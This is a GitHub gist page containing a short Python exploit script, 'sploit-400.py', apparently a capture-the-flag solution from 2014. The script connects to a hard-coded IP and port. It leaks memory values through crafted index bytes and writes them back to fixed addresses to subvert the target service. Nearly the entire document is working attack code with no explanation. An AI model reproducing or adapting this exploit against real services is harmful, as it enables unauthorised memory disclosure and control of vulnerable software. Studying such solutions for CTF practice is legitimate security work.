Create a gist now

Instantly share code, notes, and snippets.

@eQu1NoX /sploit-400.py Secret
Created Sep 20, 2014

What would you like to do?
from socket import create_connection
from struct import pack as p
from struct import unpack as u
def s_wrap(s, data):
print "[+] Sending %s" %(repr(data))
s.send(data)
def leak_address(address):
base = 0x0804A0C0
diff = address - base
index = diff / 4
s_wrap(s, chr(160+index))
value = u("<I", s.recv(1024))[0]
return value
s = create_connection(("54.85.89.65", 8888))
print s.recv(1024)
s_wrap(s, chr(168))
g2 = u("<I", s.recv(1024))[0]
g2_add = 0x0804A0E0
for i in range(8):
address = g2_add + (i * 4)
ladd = leak_address(address)
s_wrap(s, chr(224+i))
s_wrap(s, p("<I", ladd))
s_wrap(s, chr(0x80))
print repr(s.recv(1024))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment